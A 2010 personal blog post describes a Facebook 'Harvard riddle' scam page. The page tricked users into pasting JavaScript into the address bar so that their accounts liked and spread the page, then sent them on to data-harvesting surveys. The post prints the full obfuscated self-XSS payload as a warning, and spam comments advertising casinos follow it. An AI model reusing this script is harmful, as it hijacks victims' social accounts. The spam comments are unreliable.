Navigation





About Me

Narendran C R
London, UK
Follow me
Linkedin Facebook Twitter Youtube Blogspot



Wednesday, April 28, 2010

Facebook XSS attack - Only 4% of harvard grads can solve this riddle...

Recently I saw one of my friend "Liked" the Page "Only 4% of harvard grads can solve this riddle..." on Facebook. He is one of my good friends who I respect a lot and I know he is not very active in sharing information on Facebook. Obviously I was tempted to visit the page and more over I like solving puzzles and with the title "Only 4% Harvard grad"!!! no words to explain.


First page had the question and I started reading... When reached half of the question, I started thinking of various answers!!! Snow? Air? Storm? Fire?!!! Blah Blah Blah... and when I finished reading the question, the answers in my mind was contradicting each other. May be that is why only 4% of Harvard grads could solve this! I thought. Until now I had no second thoughts.

When I moved on to second page it asked me to press series of keys. I started feeling suspicious about it. It asked me to press series of keys, first press and hold "ctrl" key and then "c". Almost every one would know that it is shortcut to copy something and I know it will not work out for me as I am using Apple Mac machine. I just followed the instructions...

1. Press ctrl + c (copy something... but what the hell it is copying!!! I did not select anything)
2. Press alt + d (Haaa! this neither works in Mac. It is go to the address bar command for windows... but still I dont know what is supposed to be copied but I am now sure it is a bogus)
3. Last step ctrl + v and press enter (Ta da.... Ultimate goal reached..... I am 100% confident it is some sort of attack)

Now I am more curious to know what kind of attack it is.  Immediately I switched over to my windows machine and made sure that I was not logged in and visited the Page "Only 4% of harvard grads can solve this riddle..." as instructed I copied the content but didn't paste it in the address bar instead used textpad to analyse the content (typical software engineer ;p). I didn't want to spend much time in interpreting it as I was in middle of documenting my dissertation. Smartly thinking (:D நானே சொல்லிகிட்டா தான் உண்டு!!) I concluded that the javascript will post a message in your wall that you like the page and your friends can see and become a victim :D. If any one want the script see below.
/************** Javascript ******************************/
javascript:(
function()
{
    a='app112010525500764_jop';
    b='app112010525500764_jode';
    ifc='app112010525500764_ifc';
    ifo='app112010525500764_ifo';
    mw='app112010525500764_mwrapper';
    eval(function(p,a,c,k,e,r)
        {
            e=function(c)
            {
                return(c35?String.fromCharCode(c+29):c.toString(36))
            };
            if(!''.replace(/^/,String)){while(c--)r[e(c)]=k[c]||e(c);
            k=[function(e){return r[e]}];
            e=function(){return'\\w+'};
            c=1};
            while(c--)if(k[c])p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c]);
            return p
        }
    ('J e=["\\n\\g\\j\\g\\F\\g\\i\\g\\h\\A","\\j\\h\\A\\i\\f","\\o\\f\\h\\q\\i\\f\\r\\f\\k\\h\\K\\A\\L\\t","\\w\\g\\t\\t\\f\\k","\\g\\k\\k\\f\\x\\M\\N\\G\\O","\\n\\l\\i\\y\\f","\\j\\y\\o\\o\\f\\j\\h","\\i\\g\\H\\f\\r\\f","\\G\\u\\y\\j\\f\\q\\n\\f\\k\\h\\j","\\p\\x\\f\\l\\h\\f\\q\\n\\f\\k\\h","\\p\\i\\g\\p\\H","\\g\\k\\g\\h\\q\\n\\f\\k\\h","\\t\\g\\j\\z\\l\\h\\p\\w\\q\\n\\f\\k\\h","\\j\\f\\i\\f\\p\\h\\v\\l\\i\\i","\\j\\o\\r\\v\\g\\k\\n\\g\\h\\f\\v\\P\\u\\x\\r","\\B\\l\\Q\\l\\R\\B\\j\\u\\p\\g\\l\\i\\v\\o\\x\\l\\z\\w\\B\\g\\k\\n\\g\\h\\f\\v\\t\\g\\l\\i\\u\\o\\S\\z\\w\\z","\\j\\y\\F\\r\\g\\h\\T\\g\\l\\i\\u\\o"];
    d=U;
    d[e[2]](V)[e[1]][e[0]]=e[3];
    d[e[2]](a)[e[4]]=d[e[2]](b)[e[5]];
    s=d[e[2]](e[6]);
    m=d[e[2]](e[7]);
    c=d[e[9]](e[8]);
    c[e[11]](e[10],I,I);
    s[e[12]](c);
    C(D(){W[e[13]]()},E);
    C(D(){X[e[16]](e[14],e[15])},E);
    C(D(){m[e[12]](c);
    d[e[2]](Y)[e[4]]=d[e[2]](Z)[e[5]]},E);
    ',62,69,'||||||||||||||_0x95ea|x65|x69|x74|x6C|x73|x6E|x61||x76|x67|x63|x45|x6D||x64|x6F|x5F|x68|x72|x75|x70|x79|x2F|setTimeout|function|5000|x62|x4D|x6B| true|var|x42|x49|x48|x54|x4C|x66|x6A|x78|x2E|x44|document|mw|fs|SocialGraphManager|ifo|ifc|||||||'.split('|'),0,{}))
}
)();
************************end of scrpt**********************************

Wait... still the attack is not complete. The motto of this attack is not just getting visitors to the page. It has still not revealed the answer!!! in fact there is no answer to the question. It will ask you to take a survey and redirect to different survey pages like "prizes .uk .com", "rewardstoday .co .uk" (Intentionally left spaces so that you don't become a victim :p) where you will be asked for information like your email address, name, phone number etc etc and even you credit card number :D.

Any way there is no answer for the question so you don't have to worry thinking about it...

There are already about 87,223 Victims and we don't really know how many of them gave out their personal information or credit card information!!! and each time when I hit refresh it is increasing by at least 50!!! I realized the potential of social media...

Now why did I write this blog? hoping that this might educate some people who really are innocent and might become victim.

What we can do? Visit the page "Only 4% of harvard grads can solve this riddle..." scroll to bottom and report this page so that we help taking these pages down.

Thank you very much for taking your time...

3 comments:

  1. MGM National Harbor Resort and Casino - JT Hub
    JT Hub offers 군산 출장샵 hotel-style amenities to all types of 창원 출장안마 people, and provides you 슬롯 나라 with 김천 출장샵 a private entrance, 당진 출장안마 free WiFi, and WiFi.

    ReplyDelete
  2. Best Slot Machines Casinos - MapyRO
    Best 의왕 출장마사지 Slot Machines Casinos. Find the BEST and NEWEST Slot 양산 출장샵 Machines casinos 목포 출장마사지 near you. Earn Bonus points, buy 영주 출장안마 and activate exclusive bonuses. 의왕 출장마사지

    ReplyDelete
  3. Anonymous2:30 AM

    Losing money isn't fun, and it’s even less so when you skipped the magic present simply to watch your money disappear 1xbet into a machine. According to wizardofodds.com, the better the game, the more severe|the extra serious} the chances to win. If you don’t want to take care of complicated table games, Michael Bluejay of vegasclick.com recommends video poker as a great various if you’re keen to learn the correct technique. Derk Boss, a licensed Nevada non-public investigator and casino security surveillance skilled, agrees. “That’s a game the place there are methods you can to|you probably can} research,” he tells Fox News. “It doesn’t assure you’re going to win, nevertheless it provides you a much better probability.

    ReplyDelete